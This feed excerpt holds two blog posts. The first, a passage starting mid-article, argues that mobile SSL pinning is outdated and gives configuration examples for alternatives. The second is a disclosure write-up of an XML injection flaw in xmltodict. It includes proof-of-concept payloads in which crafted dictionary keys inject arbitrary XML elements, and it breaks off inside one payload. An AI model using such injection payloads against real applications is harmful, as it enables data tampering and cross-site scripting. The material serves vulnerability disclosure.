&lt;p&gt;These teams had adopted a &quot;set and forget&quot; mentality, only to have their apps suddenly unable to connect when the backend&apos;s certificate chain changed.&lt;/p&gt;
&lt;p&gt;In today&apos;s agile DevOps environment of frequent certificate renewals, pinning turns certificate management into a landmine; if you&apos;re not extremely careful, a normal cert update could brick your app&apos;s network functionality.&lt;/p&gt;
&lt;h3&gt;Limited Security Benefits (and False Sense of Security)&lt;/h3&gt;
&lt;p&gt;Ironically, the security gains from pinning are not as strong as they once appeared. Pinning is a client-side control that can be bypassed by determined attackers who have control over the runtime environment.&lt;/p&gt;
&lt;p&gt;Security testers and malicious actors routinely use tools like &lt;a href=&quot;https://frida.re/&quot;&gt;Frida&lt;/a&gt; (a dynamic instrumentation toolkit) or custom frameworks to hook or modify app behavior and disable SSL pinning checks at runtime.&lt;/p&gt;
&lt;p&gt;In other words, an attacker who is sophisticated enough to perform an active MITM on your app is likely capable of also defeating pinning (by rooting/jailbreaking the device or using instrumentation). This means pinning often stops only casual or passive attackers, not a dedicated adversary, giving developers an illusion of security.&lt;/p&gt;
&lt;p&gt;As one &lt;a href=&quot;https://8ksec.io/why-you-should-remove-ssl-pinning-from-your-mobile-apps-in-2025/&quot;&gt;industry blog&lt;/a&gt; put it:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;SSL pinning is often recommended as a best practice, but in reality, it is an illusion of security ... it can easily be bypassed by attackers, making it more of an inconvenience for developers than a robust security measure.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Also, consider the scenario of a compromised server key: if the very certificate or key you pinned is stolen by an attacker, pinning won&apos;t help; the attacker can then impersonate the server with the valid certificate, and the app will happily trust it.&lt;/p&gt;
&lt;p&gt;Pinning doesn&apos;t account for key compromise (whereas the broader PKI ecosystem at least attempts revocation, etc.). In summary, pinning is not a silver bullet: it stops some attacks but is far from foolproof.&lt;/p&gt;
&lt;h3&gt;No Protection Against CA Ecosystem Improvements&lt;/h3&gt;
&lt;p&gt;The original motivation of pinning, fear of rogue CAs, has been largely mitigated by improvements in the industry (more on this later). Browsers and operating systems have become much more aggressive at policing CAs and reacting to mis-issuance. Major tech companies maintain tight control of root trust stores and have shown willingness to rapidly distrust CAs that go astray.&lt;/p&gt;
&lt;p&gt;Initiatives like &lt;a href=&quot;https://en.wikipedia.org/wiki/Certificate_Transparency&quot;&gt;Certificate Transparency (CT)&lt;/a&gt; now provide visibility into every certificate issued, making it hard for a bad cert to go unnoticed. In essence, the public PKI infrastructure is more secure and agile than it was a decade ago, with shortened certificate lifetimes and automated issuance.&lt;/p&gt;
&lt;p&gt;The cost-benefit equation has changed: the risk of a rogue certificate (which pinning would protect against) is now quite low, whereas the risk of your own app breaking due to pinning is comparatively higher.&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning#:~:text=Considering%20the%20current%20risks%20in,security%20as%20a%20competitive%20advantage.&quot;&gt;OWASP Foundation&apos;s guidance as of 2025&lt;/a&gt; concludes that:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Considering the current risks in the CA and browser space and comparing them to the risk of down time, pinning is not recommended.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In short, the security community believes the web PKI + modern enhancements can be trusted enough in most cases, such that pinning&apos;s marginal benefit isn&apos;t worth its very real costs.&lt;/p&gt;
&lt;h3&gt;Misuse and Implementation Pitfalls&lt;/h3&gt;
&lt;p&gt;Pinning is tricky to implement correctly. Many developers in the past have made mistakes like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;pinning the &lt;strong&gt;leaf certificate only&lt;/strong&gt; (which changes at every renewal),&lt;/li&gt;
&lt;li&gt;pinning only one of several backend hosts,&lt;/li&gt;
&lt;li&gt;not providing a graceful fallback.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A notorious example in web security was &lt;a href=&quot;https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning&quot;&gt;HTTP Public Key Pinning (HPKP)&lt;/a&gt;, a now-deprecated mechanism where servers told browsers to pin keys; many sites ended up bricking themselves by pinning incorrectly (so much so that browsers removed HPKP support entirely by 2019).&lt;/p&gt;
&lt;p&gt;In mobile apps, a common mistake is failing to include a backup key. Both Android and iOS docs urge that if you must pin, include multiple pins (e.g., the current key and a future key under your control, or pin a CA&apos;s key).&lt;/p&gt;
&lt;p&gt;Another pitfall is that developers sometimes confuse certificate validation with pinning and accidentally disable validation, thinking they&apos;ll &quot;do pinning manually.&quot; Google explicitly warns against solutions that install a do-nothing &lt;code&gt;TrustManager&lt;/code&gt; (which accepts all certs); that&apos;s worse than no pinning, as it disables security entirely.&lt;/p&gt;
&lt;p&gt;Overall, there&apos;s a lot of room for error, and an improperly implemented pin can downgrade security or cause needless failures. It&apos;s a fragile mechanism requiring careful engineering discipline that many teams lack.&lt;/p&gt;
&lt;h3&gt;Interference with Debugging, Testing, and User Environments&lt;/h3&gt;
&lt;p&gt;SSL pinning doesn&apos;t just hinder attackers; it can hinder legitimate scenarios too. Developers and QA/security testers often need to intercept HTTPS traffic for debugging (using tools like Charles Proxy or Burp Suite), but a pinned app will simply refuse to connect through these tools because the proxy&apos;s certificate isn&apos;t the pinned one.&lt;/p&gt;
&lt;p&gt;This means teams have to build backdoors or special debug builds without pinning to allow testing, adding complexity. From a penetration testing perspective, pinning can slow down the assessment (testers must use jailbreak/root techniques to bypass it), but as noted, it&apos;s not a serious roadblock, just an inconvenience.&lt;/p&gt;
&lt;p&gt;More importantly, pinning can disrupt real-world network environments. Many enterprise networks and antivirus products legitimately intercept TLS traffic (with the device&apos;s consent) to scan for threats, using a private CA installed on the device.&lt;/p&gt;
&lt;p&gt;A corporate employee running your app behind such a proxy or a user with a network security tool might find your app doesn&apos;t work at all due to pinning. As &lt;a href=&quot;https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning&quot;&gt;OWASP notes&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Many corporate environments use MITM based TLS inspection, which issues cloned certificates from a corporate trusted CA. While the naming information would match, the certificate’s public key would not. This could create an unintended denial of service on the application.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In other words, your app could be completely unable to function on certain networks because it rejects the proxy&apos;s certificate, even if that proxy is trusted by the operating system. This makes pinning a liability in terms of compatibility and user experience.&lt;/p&gt;
&lt;p&gt;It can also complicate operational troubleshooting: if an outage occurs (say your server switches to a new cert chain), it might not be immediately obvious to developers that the pinning is the culprit, leading to longer downtime.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;Given these issues, it&apos;s no surprise that platform providers have changed their stance. Google&apos;s Android team and Apple both discourage SSL pinning for most apps.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;Android Developers Guide&lt;/strong&gt; bluntly states that pinning:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;is not recommended for Android apps&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;due to exactly the kinds of fragility and maintenance problems described.&lt;/p&gt;
&lt;p&gt;Apple&apos;s guidance is similar: an official &lt;a href=&quot;https://developer.apple.com/news/?id=g9ejcf8y&quot;&gt;Apple Developer Technical Note from 2021&lt;/a&gt; emphasizes that:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Pinning certificates is not required&quot; for security and &quot;in most cases, pinning is not necessary and should be avoided&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;with default TLS trust sufficing for the vast majority of apps.&lt;/p&gt;
&lt;p&gt;Both Google and Apple essentially ask developers: are you sure you need to do this? Only in very special circumstances (like complying with a specific regulatory requirement to trust a private CA, or an extremely high-risk threat model) might pinning be justified, and even then, it must be managed carefully with fallback plans.&lt;/p&gt;
&lt;p&gt;The overarching message is clear: &lt;strong&gt;SSL pinning has become a legacy approach and is no longer a best practice for mobile app security.&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;Modern Best Practices for Securing Mobile HTTPS Communications&lt;/h2&gt;
&lt;p&gt;With SSL pinning largely deprecated, what should mobile developers and security testers focus on to
ensure secure HTTPS connections? The good news is that today&apos;s platforms and infrastructure offer
many layers of protection by default. Here are current best practices for securing network
communication in mobile apps without resorting to fragile pinning:&lt;/p&gt;
&lt;h3&gt;1. Rely on the Built-in PKI and Trust Stores&lt;/h3&gt;
&lt;p&gt;Both Android and iOS maintain a system CA trust store that is continuously updated with trusted root certificates. These platforms (Google, Apple, Mozilla, Microsoft) collaboratively manage trust and will revoke or distrust bad CAs to protect users.&lt;/p&gt;
&lt;p&gt;Unless you have a specific need, trust the system to do its job. The major OS vendors have made security of the certificate ecosystem a priority and have far more resources to evaluate CAs than any individual app developer.&lt;/p&gt;
&lt;p&gt;In modern Android and iOS, apps by default trust only well-vetted public CAs (and on Android, user-added CAs are not trusted by apps targeting recent API levels, unless you opt in). This significantly limits the risk of a rogue certificate being accepted.&lt;/p&gt;
&lt;p&gt;In essence, leveraging the default PKI means you inherit improvements like CA/Browser Forum governance, browser/OS root programs, and timely security updates. Pinning is usually unnecessary because the default trust model is robust for most use cases.&lt;/p&gt;
&lt;h3&gt;2. Enable Certificate Transparency (CT) and Monitoring&lt;/h3&gt;
&lt;p&gt;Certificate Transparency is a system of public logs that record all certificates issued by publicly trusted CAs. CT has become mandatory for CAs (browsers will distrust certificates not present in CT logs).&lt;/p&gt;
&lt;p&gt;Mobile apps can take advantage of this by requiring CT compliance and monitoring logs for their domains.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Android:&lt;/strong&gt; Network Security Configuration allows an opt-in for certificate transparency, meaning your app will only accept certificates that have valid SCTs (Signed Certificate Timestamps) proving they were logged in CT.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;iOS:&lt;/strong&gt; Provides the &lt;code&gt;NSRequiresCertificateTransparency&lt;/code&gt; flag in App Transport Security to require CT for certain domains, as noted by Apple&apos;s engineers.&lt;/li&gt;
&lt;/ul&gt;
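&lt;p&gt;On iOS, the opt-in is a small &lt;code&gt;Info.plist&lt;/code&gt; addition. A sketch (the domain is a placeholder; &lt;code&gt;NSRequiresCertificateTransparency&lt;/code&gt; is set per domain under the ATS exception-domains dictionary):&lt;/p&gt;

```xml
&amp;lt;key&amp;gt;NSAppTransportSecurity&amp;lt;/key&amp;gt;
&amp;lt;dict&amp;gt;
    &amp;lt;key&amp;gt;NSExceptionDomains&amp;lt;/key&amp;gt;
    &amp;lt;dict&amp;gt;
        &amp;lt;key&amp;gt;api.example.com&amp;lt;/key&amp;gt;
        &amp;lt;dict&amp;gt;
            &amp;lt;key&amp;gt;NSRequiresCertificateTransparency&amp;lt;/key&amp;gt;
            &amp;lt;true/&amp;gt;
        &amp;lt;/dict&amp;gt;
    &amp;lt;/dict&amp;gt;
&amp;lt;/dict&amp;gt;
```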
&lt;p&gt;Enforcing CT means that if someone (even a trusted CA) tries to issue a certificate for your domain behind your back, it would not be accepted by the app unless it&apos;s publicly logged (and you could detect it).&lt;/p&gt;
&lt;p&gt;Apple&apos;s security team has highlighted CT as a &lt;em&gt;&quot;great tool&quot;&lt;/em&gt; to verify server certificates and recommended checking for CT compliance when evaluating a server&apos;s trustworthiness.&lt;/p&gt;
&lt;p&gt;In practice, you should also set up CT monitoring: there are services (and free tools) that alert you if a new certificate for your app&apos;s domains appears in the logs. This way, you can quickly respond to any misissued or malicious certificates (e.g., by revoking them or alerting the CA) without needing to pin.&lt;/p&gt;
&lt;p&gt;CT provides transparency and accountability in the certificate ecosystem, covering the threat that pinning was meant to catch, but in a far more flexible way.&lt;/p&gt;
&lt;h3&gt;3. Use HSTS and Secure Server Configurations&lt;/h3&gt;
&lt;p&gt;On the server side, enable &lt;strong&gt;HTTP Strict Transport Security (HSTS)&lt;/strong&gt; for your domains. HSTS instructs browsers (and by extension in-app web views) to never downgrade to HTTP and to automatically redirect to HTTPS.&lt;/p&gt;
&lt;p&gt;While a mobile app&apos;s own network calls will typically be coded to use HTTPS already, HSTS is still valuable if any part of your app uses web content or if users might interact with links to your domain. It eliminates certain MITM tricks (like stripping HTTPS to HTTP).&lt;/p&gt;
&lt;p&gt;Moreover, even though mobile apps don&apos;t inherently parse HSTS headers, having HSTS on your API domain means if someone tries to access it via a browser (for example, an OAuth login flow or a user following a link), they&apos;ll be protected.&lt;/p&gt;
&lt;p&gt;Consider getting your domain on the &lt;strong&gt;HSTS preload list&lt;/strong&gt; if appropriate, which ensures all clients know to use HTTPS from the first visit.&lt;/p&gt;
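&lt;p&gt;Enabling HSTS is a one-line response header. For example, on nginx (the one-year &lt;code&gt;max-age&lt;/code&gt; is a common choice; only add the &lt;code&gt;preload&lt;/code&gt; directive once you are ready to commit to the preload list):&lt;/p&gt;

```nginx
# Sent on HTTPS responses; browsers will then refuse plain HTTP
# for this domain (and its subdomains) for the next year.
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always;
```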
&lt;p&gt;Alongside HSTS, make sure your TLS configuration on the server is solid:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Support the latest protocols (TLS 1.3 and 1.2, drop older versions).&lt;/li&gt;
&lt;li&gt;Use strong cipher suites.&lt;/li&gt;
&lt;li&gt;Keep your server&apos;s TLS library up to date.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The good news is that mobile platforms enforce this to some extent:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;iOS&apos;s App Transport Security by default requires TLS 1.2+ and reasonable ciphers.&lt;/li&gt;
&lt;li&gt;Android will by default use TLS 1.3 when available.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So adhere to those defaults; don&apos;t weaken security by allowing old protocols. Enabling features like &lt;strong&gt;OCSP Stapling&lt;/strong&gt; and checking certificate revocation status can also help (though revocation checking in mobile apps can be tricky and is often bypassed if not stapled).&lt;/p&gt;
&lt;p&gt;In summary: treat your server&apos;s TLS config with the same care as you would for a banking website: score an &quot;A&quot; on SSL Labs, use modern TLS and strong algorithms. A robust TLS setup reduces the risk of any successful MITM.&lt;/p&gt;
&lt;h3&gt;4. Leverage Public Key Infrastructure Extensions (CAA, etc.)&lt;/h3&gt;
&lt;p&gt;The broader PKI ecosystem offers additional tools to harden certificate issuance. One such measure is &lt;strong&gt;CAA (Certificate Authority Authorization)&lt;/strong&gt; DNS records.&lt;/p&gt;
&lt;p&gt;By publishing CAA records, you specify which CAs are allowed to issue certificates for your domain. This won&apos;t directly be known to the app, but it prevents unauthorized CAs from issuing certs in the first place (or at least, compliant CAs will refuse if they&apos;re not on your list).&lt;/p&gt;
&lt;p&gt;For example, you might set a CAA record to only allow &lt;code&gt;pki.goog&lt;/code&gt; (Google Trust Services) or Let&apos;s Encrypt for your domain. This way, even if someone tricked a lesser-known CA, that CA should deny the request.&lt;/p&gt;
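&lt;p&gt;In DNS zone-file form, that example looks like the following (&lt;code&gt;example.com&lt;/code&gt; and the contact address are placeholders; the &lt;code&gt;iodef&lt;/code&gt; record tells compliant CAs where to report rejected issuance requests):&lt;/p&gt;

```dns
example.com.  IN  CAA  0 issue "pki.goog"
example.com.  IN  CAA  0 issue "letsencrypt.org"
example.com.  IN  CAA  0 iodef "mailto:security@example.com"
```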
&lt;p&gt;Using CAA in combination with CT monitoring significantly lowers the likelihood of misissued certs going unnoticed.&lt;/p&gt;
&lt;p&gt;Another emerging concept is &lt;strong&gt;DANE (DNS-based Authentication of Named Entities)&lt;/strong&gt;, where the TLS public key or certificate is pinned in DNS (secured by DNSSEC). DANE isn&apos;t widely adopted in mobile apps yet, but it&apos;s an interesting future path.&lt;/p&gt;
&lt;p&gt;The key point is that there are standards-based ways to lock down certificate issuance and validity that operate at the infrastructure level, rather than baked into app code.&lt;/p&gt;
&lt;h3&gt;5. Follow Platform Security Best Practices&lt;/h3&gt;
&lt;p&gt;Use the security features provided by Android and iOS rather than reinventing the wheel.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;On Android:&lt;/strong&gt;&lt;br /&gt;
Use &lt;strong&gt;Network Security Configuration&lt;/strong&gt; files to declaratively enforce policies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;disallow cleartext (HTTP) entirely,&lt;/li&gt;
&lt;li&gt;add any custom CA if you genuinely need it (for instance, in a debug build or for an internal server),&lt;/li&gt;
&lt;li&gt;enable the certificate transparency requirement as mentioned earlier.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Network Security Config also allows a &lt;strong&gt;&lt;code&gt;debug-overrides&lt;/code&gt;&lt;/strong&gt; section, so you can allow certain debugging CAs during development without affecting production builds, a much safer approach than writing custom trust logic.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;On iOS:&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;App Transport Security (ATS)&lt;/strong&gt; is enabled by default, which already requires HTTPS connections, strong ciphers, and certificate trust built-in. Avoid turning off ATS exceptions unless absolutely necessary.&lt;/p&gt;
&lt;p&gt;If you have to allow an HTTP endpoint or a weaker cipher for some reason, scope it narrowly in your &lt;code&gt;Info.plist&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
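&lt;p&gt;The &lt;code&gt;debug-overrides&lt;/code&gt; mechanism mentioned above looks roughly like this; the extra trust anchors apply only to debuggable builds, so proxy CAs used for testing never reach release builds (the raw resource name is a placeholder):&lt;/p&gt;

```xml
&amp;lt;network-security-config&amp;gt;
    &amp;lt;debug-overrides&amp;gt;
        &amp;lt;trust-anchors&amp;gt;
            &amp;lt;!-- Trust user-installed CAs (e.g. Burp/Charles) in debug builds only --&amp;gt;
            &amp;lt;certificates src="user" /&amp;gt;
            &amp;lt;certificates src="@raw/debug_proxy_ca" /&amp;gt;
        &amp;lt;/trust-anchors&amp;gt;
    &amp;lt;/debug-overrides&amp;gt;
&amp;lt;/network-security-config&amp;gt;
```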
&lt;p&gt;Essentially, align with the platform&apos;s default security posture: both iOS and Android by 2025 have very sane defaults that eliminate most trivial MITM opportunities (e.g. no user-added CA trust on Android by default for new apps, mandatory TLS, etc.).&lt;/p&gt;
&lt;p&gt;Where you have special needs, prefer configuration to code. And if you ever consider doing pinning-like restrictions, use the provided configuration mechanisms rather than custom code; they are less error-prone and easier to update.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;SSL pinning had its moment in the spotlight as a clever solution to bolster connection security in mobile
apps. But as we&apos;ve discussed, that solution has proven to be a double-edged sword. Over time, the
drawbacks (unexpected outages, difficult maintenance, compatibility problems, and limited real
security gains) have become apparent through hard experience.&lt;/p&gt;
&lt;p&gt;In the meantime, the security of the web&apos;s PKI infrastructure has improved with initiatives like shorter
certificate lifetimes, Certificate Transparency, and stricter CA oversight. The competitive advantage
today is to work with those improvements rather than against them.&lt;/p&gt;
&lt;p&gt;Industry leaders and platform providers now virtually all agree: &lt;strong&gt;SSL pinning is largely obsolete as a
best practice.&lt;/strong&gt; Unless you have a truly compelling use case and the capacity to manage it correctly, you
should avoid pinning in your Android and iOS apps.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Google says don&apos;t do it.&lt;/li&gt;
&lt;li&gt;Apple says you shouldn&apos;t need it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you still think you need pinning, carefully weigh the trade-offs, implement it with multiple
pins, backup keys, and a rotation plan, and be prepared for the headaches that come with it.&lt;/p&gt;
&lt;p&gt;For the vast majority of mobile apps, you&apos;ll achieve far better security and reliability by embracing
modern TLS configurations and platform security features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use HTTPS everywhere (mandatory on mobile now anyway).&lt;/li&gt;
&lt;li&gt;Enforce strong TLS.&lt;/li&gt;
&lt;li&gt;Turn on certificate transparency enforcement.&lt;/li&gt;
&lt;li&gt;Keep an eye on your domain&apos;s certificates via CT logs.&lt;/li&gt;
&lt;li&gt;Harden your servers and use measures like HSTS and CAA to prevent and detect misuse of certificates.&lt;/li&gt;
&lt;/ul&gt;
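&lt;p&gt;For the last two points, the controls amount to one response header and a couple of DNS records. The domain, lifetime, and CA below are placeholders:&lt;/p&gt;

```
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

example.com.  IN  CAA  0 issue &quot;letsencrypt.org&quot;
example.com.  IN  CAA  0 iodef &quot;mailto:security@example.com&quot;
```

&lt;p&gt;The first line tells browsers to use HTTPS only for the next year; the &lt;code&gt;CAA&lt;/code&gt; records restrict which CA may issue certificates for the zone and where violations should be reported.&lt;/p&gt;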
&lt;p&gt;And remember that ultimately, security is multilayered: the transport layer is just one piece. A secure
app also involves proper authentication, data encryption at rest, code integrity checks, and so on.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;In 2025, the consensus is that it&apos;s time to move on from SSL pinning.&lt;/strong&gt;&lt;br /&gt;
What once may have provided a sense of security is now understood to be more trouble than it&apos;s worth
in most cases. By following current best practices and the guidance of Android and iOS developers, you
can secure your app&apos;s network communication in a robust way without resorting to pinning, achieving
security and stability for both your development process and your users.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Sources&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.android.com/privacy-and-security/security-ssl&quot;&gt;Android Developers : Security with network protocols&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.android.com/privacy-and-security/security-config&quot;&gt;Android Developers : Network Security Configuration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.apple.com/news/?id=g9ejcf8y&quot;&gt;Apple Developer Technical Note : &quot;Identity Pinning: How to configure server certificates for your app&quot;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.apple.com/forums/thread/675791&quot;&gt;Apple Developer Forums : Discussion on MITM protection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning&quot;&gt;OWASP Foundation : Certificate and Public Key Pinning&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://blog.cloudflare.com/why-certificate-pinning-is-outdated/&quot;&gt;Cloudflare Blog : &quot;Avoiding downtime: modern alternatives to outdated certificate pinning practices&quot;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://8ksec.io/why-you-should-remove-ssl-pinning-from-your-mobile-apps-in-2025/&quot;&gt;8ksec Blog : &quot;Why you should remove SSL Pinning from Your Mobile Apps in 2025&quot;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>CVE-2025-9375: XML Injection Vulnerability in xmltodict 0.14.2 - Mono</title><link>http://caverav.cl/posts/xmltodict-xml-injection/xmltodict-xml-injection/</link><guid isPermaLink="true">http://caverav.cl/posts/xmltodict-xml-injection/xmltodict-xml-injection/</guid><pubDate>Mon, 25 Aug 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Executive Summary&lt;/h2&gt;
&lt;p&gt;I discovered an XML Injection vulnerability in &lt;code&gt;xmltodict&lt;/code&gt; version 0.14.2, a popular Python library with over 1.5 million weekly downloads on PyPI. This vulnerability allows attackers to inject arbitrary XML markup through crafted dictionary keys, potentially leading to XML structure manipulation, data corruption, and in web contexts, cross-site scripting (XSS) attacks.&lt;/p&gt;
&lt;p&gt;The vulnerability stems from insufficient input validation in the &lt;code&gt;_emit&lt;/code&gt; function, where user-controlled dictionary keys are directly used as XML tag names without any sanitization or validation.&lt;/p&gt;
&lt;h2&gt;Background: Understanding xmltodict&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;xmltodict&lt;/code&gt; is a Python library that provides bidirectional conversion between XML and Python dictionaries. Its primary functions are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;xmltodict.parse()&lt;/code&gt; - Converts XML to Python dictionaries&lt;/li&gt;
&lt;li&gt;&lt;code&gt;xmltodict.unparse()&lt;/code&gt; - Converts Python dictionaries back to XML&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The library is widely used in web applications, APIs, and data processing pipelines where XML manipulation is required. Its popularity makes this vulnerability particularly concerning from a supply chain security perspective.&lt;/p&gt;
&lt;h2&gt;Technical Analysis&lt;/h2&gt;
&lt;h3&gt;The Vulnerable Code Path&lt;/h3&gt;
&lt;p&gt;The vulnerability resides in the &lt;code&gt;_emit&lt;/code&gt; function within &lt;code&gt;xmltodict.py&lt;/code&gt; (lines 378-451). Let&apos;s examine the critical code path:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def _emit(key, value, content_handler,
          attr_prefix=&apos;@&apos;,
          cdata_key=&apos;#text&apos;,
          depth=0,
          preprocessor=None,
          pretty=False,
          newl=&apos;\n&apos;,
          indent=&apos;\t&apos;,
          namespace_separator=&apos;:&apos;,
          namespaces=None,
          full_document=True,
          expand_iter=None):
    key = _process_namespace(key, namespaces, namespace_separator, attr_prefix)
    if preprocessor is not None:
        result = preprocessor(key, value)
        if result is None:
            return
        key, value = result
    # ... processing logic ...
    
    # VULNERABLE LINE: Direct use of user input as XML tag
    content_handler.startElement(key, AttributesImpl(attrs))  # Line 436
    
    # ... more processing ...
    
    content_handler.endElement(key)  # Line 449
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Root Cause Analysis&lt;/h3&gt;
&lt;p&gt;The vulnerability occurs because:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;No Input Validation&lt;/strong&gt;: The &lt;code&gt;key&lt;/code&gt; parameter (dictionary keys from user input) is used directly as an XML element name&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Missing Sanitization&lt;/strong&gt;: No escaping or validation is performed on the key before passing it to &lt;code&gt;startElement()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Trust Assumption&lt;/strong&gt;: The code assumes dictionary keys are safe XML tag names&lt;/li&gt;
&lt;/ol&gt;
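&lt;p&gt;The root cause is easy to reproduce with only the standard library: &lt;code&gt;xmltodict.unparse()&lt;/code&gt; emits through &lt;code&gt;xml.sax.saxutils.XMLGenerator&lt;/code&gt;, whose &lt;code&gt;startElement()&lt;/code&gt; writes the tag name verbatim. The sketch below, independent of xmltodict itself, shows an attacker-shaped key passing straight through:&lt;/p&gt;

```python
from io import StringIO
from xml.sax.saxutils import XMLGenerator
from xml.sax.xmlreader import AttributesImpl

out = StringIO()
gen = XMLGenerator(out)

# Attacker-controlled dictionary key used verbatim as a tag name
key = "item injected='1'"
gen.startElement(key, AttributesImpl({}))
gen.characters("value")   # text content IS escaped...
gen.endElement(key)       # ...but the tag name is not

print(out.getvalue())
```

&lt;p&gt;The printed element opens as &lt;code&gt;item injected=&apos;1&apos;&lt;/code&gt;, i.e. the key smuggled an attribute into the tag, exactly the class of injection that &lt;code&gt;_emit&lt;/code&gt; permits.&lt;/p&gt;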
&lt;h3&gt;XML Tag Name Requirements vs Reality&lt;/h3&gt;
&lt;p&gt;Valid XML tag names must follow these rules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Start with a letter or underscore&lt;/li&gt;
&lt;li&gt;Contain only letters, digits, hyphens, periods, and underscores&lt;/li&gt;
&lt;li&gt;Cannot contain spaces or special characters like &lt;code&gt;&amp;lt;&lt;/code&gt;, &lt;code&gt;&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;amp;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
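&lt;p&gt;These rules are mechanical to check. A minimal validator sketch, restricted to ASCII (the real XML 1.0 Name production also allows colons and many non-ASCII characters):&lt;/p&gt;

```python
import re

# Simplified ASCII subset of the XML 1.0 Name production:
# a letter or underscore, then letters, digits, underscores, periods, hyphens
XML_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_.\-]*")

for candidate in ("item", "_id", "my-tag", "1bad", "item injected", ""):
    verdict = "valid" if XML_NAME.fullmatch(candidate) else "INVALID"
    print(f"{candidate!r}: {verdict}")
```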
&lt;p&gt;The vulnerability exploits the fact that &lt;code&gt;xmltodict&lt;/code&gt; doesn&apos;t enforce these constraints.&lt;/p&gt;
&lt;h2&gt;Exploitation Scenarios&lt;/h2&gt;
&lt;h3&gt;Basic XML Structure Manipulation&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Payload:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;malicious_data = {&quot;item&amp;gt;&amp;lt;injected&amp;gt;malicious content&amp;lt;/injected&amp;gt;&amp;lt;item&quot;: &quot;value&quot;}
xml_output = xmltodict.unparse(malicious_data, full_document=False)
print(xml_output)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Output:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;item&amp;gt;&amp;lt;injected&amp;gt;malicious content&amp;lt;/injected&amp;gt;&amp;lt;item&amp;gt;value&amp;lt;/item&amp;gt;&amp;lt;injected&amp;gt;malicious content&amp;lt;/injected&amp;gt;&amp;lt;item&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The injected XML breaks the intended structure and introduces arbitrary elements.&lt;/p&gt;
&lt;h3&gt;Advanced Multi-Stage Injection&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Payload:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;complex_payload = {
    &quot;product&amp;gt;&amp;lt;price&amp;gt;999999&amp;lt;/price&amp;gt;&amp;lt;description&amp;gt;HACKED&quot;: &quot;legitimate_value&quot;,
